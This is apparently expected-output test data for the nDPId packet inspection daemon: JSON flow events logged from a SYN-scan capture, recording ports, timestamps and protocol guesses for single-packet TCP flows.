-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 